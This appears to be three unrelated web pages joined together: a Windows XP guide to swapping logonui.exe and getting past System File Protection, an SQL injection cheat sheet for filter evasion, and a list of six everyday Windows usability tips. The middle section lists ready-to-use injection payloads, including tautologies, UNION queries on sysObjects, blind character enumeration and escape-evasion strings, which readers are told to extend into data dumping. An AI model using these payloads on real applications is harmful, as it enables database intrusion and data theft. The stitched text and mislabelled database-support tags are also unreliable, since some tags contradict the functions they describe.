Change your Welcome (login) Screen

This post will only work if you have the "Use welcome screen" option activated in
Control Panel>Users Accounts>Logon and Logoff Options.
1. Make a backup copy of C:\windows\system32\logonui.exe
2. Overwrite the file with your new login screen. (be sure to use the same file name as the old logonui.exe)
3. If you ever want to revert back to the old login screen, just overwrite C:\windows\system32\logonui.exe with your backup.
Enjoy!
?Some edits and supplements
Windows System File Protection will not allow to override the file unless you follow these steps:
1. Rename the logonui.exe file in either C:\Windows\system32\dllcache or in C:\Windows\ServicePackFiles\i386
(depends on if and how you installed the servicepack).
2. Copy your custom logonui.exe to this folder.
3. Boot into safe mode and do exactly the same (rename the original file and copy in your new one) in C:\Windows\system32.
System File Protection will pop up two windows. Answer them with "cancel" and "yes".
Note: It is always better to rename the original file and not override it.
Alternatively you can use this method to change the Welcome screen :
1. Copy your custom logon file under another name, let's say logonuiA.exe, to C:\Windows\system32.
2. Open regedit (Always backup before changing anything in the registry) to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
and change the value for UIHost to logonuiA.exe.

SQL Injection cheat sheet Esp: for filter evasion

If you don't know how SQL Injection works, this page probably won't help you. This page is for people who already understand the basics of SQL Injection attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate SQL Injection vectors or how to write the data dumping or DB tampering portion of the attack. It will simply show the underlying methodology and you can infer the rest. This document was built with similar structure to my XSS Cheat Sheet to aid researchers with precise and helpful information. Because this is a living document I suggest you continue to use this site to stay up to date.

I am in need of more versions of different databases. If you have access to a database that is not mentioned below and want to contribute, please email me. If you have an RSS reader feel free to subscribe to my very low volume SQL Injection RSS feed below:

SQL Injection:

Normal SQL Injection: 1 OR 1=1
Database support: [mySQL]
Normal SQL Injection using encapsulated data: 1' OR '1'='1
Database support: [mySQL]
Blind SQL Injection to throw an error to validate that encapsulation isn't working. The goal here is to throw an error to cause the application to show us that it is not encapsulating quotes correctly: 1'1
Database support: [mySQL]
Blind SQL Injection creating an error using EXEC: 1 EXEC SP_ (or EXEC XP_)
Database support: [mySQL]
Blind SQL Injection detection (this shouldn't give us the same result if filtering is in place as we would get if we excluded the AND 1 = 1 part. If it does give us the same result it shows that the application is vulnerable): 1 AND 1=1
Database support: [mySQL]
Blind SQL Injection to attempt to locate tablenames by brute force iteration through potential names (you'll have to rename tablenames until you find a match): 1' AND 1=(SELECT COUNT(*) FROM tablenames); --
Database support: [mySQL]
Using the USER_NAME() function in SQL Server to tell us if the user is running as the administrator: 1 AND USER_NAME() = 'dbo'
Database support: [mySQL | SQL]
Evading escapes with backslashes (this assumes the application comments out a single quote with another single quote and by introducing a backslash before it, it comments out the singlequote that is added by the filter). This type of filter is applied by mySQL's mysql_real_escape_string() and PERL's DBD method $dbh->quote(): \'; DESC users; --
Database support: [mySQL | SQL]
More blind SQL Injection by attempting to create an error using the backslash method seen above: 1\'1
Database support: [mySQL | SQL]
Creating errors by calling fake tables. This can help expose vulnerable applications by attempting to create an error by calling tables that are nonexistant (try this with and without the quotes): 1' AND non_existant_table = '1
Database support: [mySQL | SQL]
Dumping usernames (assuming there is a username table and quotes are not escaped): ' OR username IS NOT NULL OR username = '
Database support: [mySQL | SQL]
Enumerating through database table names. By changing the 116 to different numbers you can use logrithmic reduction to find the first char of the database table name. Then iterating through the first 1 in 1, 1 you can eventually get the whole table name. Originally found by Kevin Spett: 1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
Database support: [mySQL | SQL]
Finding user supplied tables using the sysObjects table in SQL Server: 1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
Database support: [mySQL | SQL]
Bypassing filter evasion using comment tags: 1 UNI/**/ON SELECT ALL FROM WHERE
Database support: [mySQL | SQL]

Character Encoding Calculator

ASCII Text:

Enter your SQL Injection here

Hex Value:

URL: HTML (with semicolons):

Decimal Value:

HTML (without semicolons):

Base64 Value

Base64:

Database support reference table:

mySQL		Vector works in mySQL. Most recently tested with _.
SQL		Vector works in SQL Server. Most recently tested with _.

Note: if a vector is not marked it either does not work or it is untested.

6 useful Windows tricks

You know that feeling you get when your friends or family see you do something on your computer that they've never seen before? If you’ve had this experience, you know that “world's coolest power-user” feeling. But if you haven’t, start here. Knowledge is power!

Read these six tips for Windows 7, Windows Vista, and Windows XP that will keep you schoolin' your friends and family.

1. Don't just maximize your windows—go full screen

When you need a really big window for viewing photos and videos, don't just maximize it: go full screen! This tip works great for viewing photos and videos at maximum size in Windows Explorer or Windows Media Player, utilizing screen space usually occupied by the header at the top of the screen and the taskbar at the bottom. Here’s how:
Open any photo in Windows Explorer, or open a photo or video clip in Windows Media Player. Do one of the following:

• In Windows 7 and Windows XP, click the F11 key at the top of your keyboard.

The photo or video image enlarges to its maximum size and the title bar and taskbar are hidden.

Viewing a photo in Windows Explorer standard view

To undue full-screen mode and restore the window to its normal view, press the Esc (Escape) key at the top of your keyboard

---

2. Customize the Navigation pane

You can use the navigation pane (the left pane) to find files and folders and display links to frequently used folders and other items. You can also move or copy items to a destination in the navigation pane.
If you don't see the navigation pane on the left side of an open folder window, click Organize, point to Layout, and then click Navigation pane to display it.

To customize the navigation pane in Windows 7

1. In an open folder or library window, click Organize, and then click Folder and search options.
2. In the Folder Options dialog box, click the General tab, and then do one or both of the following:
   
   
   • To show all the folders on your computer in the navigation pane, including your personal folder, select the Show all folders check box, click Apply to see the change, and then click OK.
   • To automatically expand the navigation pane to the folder that's selected in the folder window, select the Automatically expand to current folder check box, and then click OK.

Customizing the navigation pane in Windows 7

More ways to customize your favorites in Windows 7

• To add a folder, a saved search, a library, or even a drive as a favorite, drag it to the Favorites section in the navigation pane. Note: You can’t add individual file to Favorites, but you can add them to any folder in Favorites.
• To change the order of favorites, drag a favorite to a new position in the list.
• To restore the default favorites in the navigation pane, right-click Favorites, and then click Restore Favorite Links.
• To view the folder where your favorites are stored, click Favorites in the navigation pane. Favorites are stored as shortcuts.
• To remove a favorite, right-click the favorite, and then click Remove. This removes the favorite from the navigation pane—it doesn't delete the files or folders that the shortcut points to.

The Favorites area of the navigation pane in Windows 7

Add folders and files in Windows Vista

In Windows Vista, you can add folders to Favorite Links in the navigation pane so that you can open them from any folder window at any time. To do this, first open the folder that contains the subfolder you want to add. Then simply drag its icon from the original folder to where you want it in the navigation pane. You can also click Folders at the bottom of the pane and drag a folder from the folder list up into the Favorite Links section of the pane. Note: You can’t add individual files to Favorite Links, but you can add them to any folder in Favorite Links.

Pictures folder in Windows

---

3. Pin a program or items to the Windows 7 taskbar

You know what would make a great taskbar? One where you could pin your favorite applications or files so that you could open them quickly from any window at any time. Guess what? You can.
In Windows 7, you can also pin shortcuts for favorite or frequently used files, folders, and websites to the Jump Lists for each of those programs to the taskbar. Learn more about Jump Lists.
Pin a program to the taskbar
To pin a program shortcut to the taskbar, do one of the following:

• If the program is already running, right-click the program's button on the taskbar (or drag the button toward the desktop) to open the program’s Jump List, and then click Pin this program to taskbar.
• Or if the program isn't running, click Start, find the program’s icon, right-click the icon, and then click Pin to Taskbar.
• You can also pin a program by dragging the program's shortcut from the desktop or Start menu to the taskbar.

Pinning a program to the taskbar

Using Jump Lists in Windows 7

Jump Lists on the taskbar give you quick access to the things you use most often. You can drag a file, folder, or website icon or a shortcut from the Start menu or the desktop to the taskbar. This pins the item to the Jump List and also pins the associated program to the taskbar. If you drag the shortcut to the taskbar and the associated program isn't already pinned there, then that program is pinned to the taskbar and the item is pinned to the program’s Jump List.

Pinning an item to a Jump List on the taskbar

To view the Jump List for a program, right-click the program's button on the taskbar. To open an item from a Jump List, open the program's Jump List, and then click the item.

---

4. Customize the Quick Launch Bar in Windows XP

In Windows XP, the customizable Quick Launch Bar also gives you convenient shortcuts to your favorite programs, folders, and files. The Quick Launch Bar remains accessible from most windows, so it’s a handy way to open the applications and files you use frequently.
If the Quick Launch Bar isn’t already visible to the right of the Start button , you’ll need to turn it on. To do that, right-click an open area of the taskbar. Hover your mouse pointer over Toolbars, then click Quick Launch. The Quick Launch Bar appears on your taskbar.

The Quick Launch Bar on the Windows XP taskbar

To add a program shortcut to the Quick Launch Bar, click the Start button, click All Programs, then click and drag the application you want to the Quick Launch Bar. Release the mouse button and the application’s icon appears in the Quick Launch Bar.
To add a folder or file shortcut to the Quick Launch Bar, open Windows Explorer, navigate to the folder, subfolder, or individual file you want, click and drag the folder or file you want to the Quick Launch Bar. Release the mouse button and the icon for the folder or file appears in the Quick Launch Bar.
To remove a shortcut from the Quick Launch Bar, right-click on the icon in the Quick Launch Bar of the application, folder, or file you want to remove and right-click it, click Delete, and then click Yes when asked if you’re sure you want to delete the shortcut. Note: Although the shortcut is removed from the Quick Launch Bar, the actual application, folder, or file has not been deleted from your computer.

---

5. Arrange windows on your desktop

In Windows, you can arrange windows side by side, which can be especially helpful when comparing two documents or when moving files from one place to another. Note: If you’re using a nonstandard setup (such as dual monitors), the tricks below may not work as expected.

Windows 7

1. Drag the title bar of a window to the left or right side of the screen until an outline of the expanded window appears.
2. Release the mouse to expand the window.
3. Repeat steps 1 and 2 with another window to arrange the windows side by side.

To return a window to its original size click the Maximize button in the window’s title bar and the window expands to full size.

The Maximize button

Learn more about managing multiple windows in Windows 7.
Tip: To snap an active window to the side of the desktop by using the keyboard, press Windows logo key +Left Arrow or Windows logo key +Right Arrow.

Viewing windows side by side in Windows

Windows Vista and Windows XP

In Windows Vista and Windows XP, it’s easy to display any two (or more) windows side by side on the desktop, all equally sized. Press and hold the Ctrl key and click two or more of the window buttons on the taskbar that you want to open. Release the Ctrl key, right-click, and then do one of the following:

• Windows Vista users, click Show Windows Side by Side.

Windows Vista, Show Windows Side by Side command.

Windows XP, Tile Vertically command.

---

6. Organize your files into groups

Windows offers a variety of options for organizing folders and files in the ways that work best for you.

Windows 7

The easiest and most effective way to organize your stuff in Windows 7 is to use file arrangements in your libraries.

You can arrange files in the Documents library by author, for example, or you can arrange the Music library by artist if you're looking for an album or song by a particular band.

To arrange a library

1. In the taskbar, click the Windows Explorer button .
2. In the navigation pane (the left pane), click a library (such as Music).
3. In the library pane (above the file list), click the Arrange by menu, and then choose a property. For example, in the Music library, you can choose Artist to quickly arrange your music collection by artist.
   
   
   The "Arrange by" menu
4. When you arrange your files, Windows doesn't just put your files in a different order. Instead, they are presented in a completely different way. The arrangements work differently depending on which one you choose. For example, arranging your pictures by month puts your pictures into stacks, like this:
   
   
   Files arranged in "stacks"
   Arranging by day puts them into groups, like this:
   
   
   Files arranged in "groups"
   There are four default libraries in Windows 7, each with its own specific arrangements. You can also create new libraries and choose which arrangements are available for them.
   For more information about libraries, see Working with libraries.

Windows Vista

Open a folder that contains several different subfolders and file types. Right-click any empty space on the window's contents pane, point to Group By, and then click your grouping choice.

Windows Vista Group by command.

Windows XP

Open a folder that contains several different subfolders and file types. Right-click any empty space on the window's contents pane, point to Arrange Icons By, and then click Show in Groups. To arrange the window's contents, right-click again in any empty space on the window's contents pane, point to Arrange Icons By, and click Name, Size, Type, or Modified (the choices may vary depending on the contents).